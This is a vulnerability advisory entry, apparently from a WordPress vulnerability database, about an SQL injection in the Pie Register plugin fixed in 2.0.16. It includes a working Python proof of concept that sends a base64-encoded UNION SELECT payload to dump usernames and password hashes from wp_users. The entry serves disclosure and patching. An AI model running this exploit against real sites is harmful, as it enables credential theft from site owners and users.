Pie Register 2.0.14-2.0.15 - SQL Injection



Description
User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise).
Proof of Concept
import requests,base64,re

url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
        "show_dash_widget":1,
        "invitaion_code":query_encoded
}
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)

Affects Plugin

fixed in version 2.0.16

References

URL https://research.g0blin.co.uk/g0blin-00040/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 1340
Verified No
WPVDB ID 7958

Timeline

Publicly Published 2015-05-04 (over 3 years ago)
Added 2015-05-04 (over 3 years ago)
Last Updated 2015-07-04 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.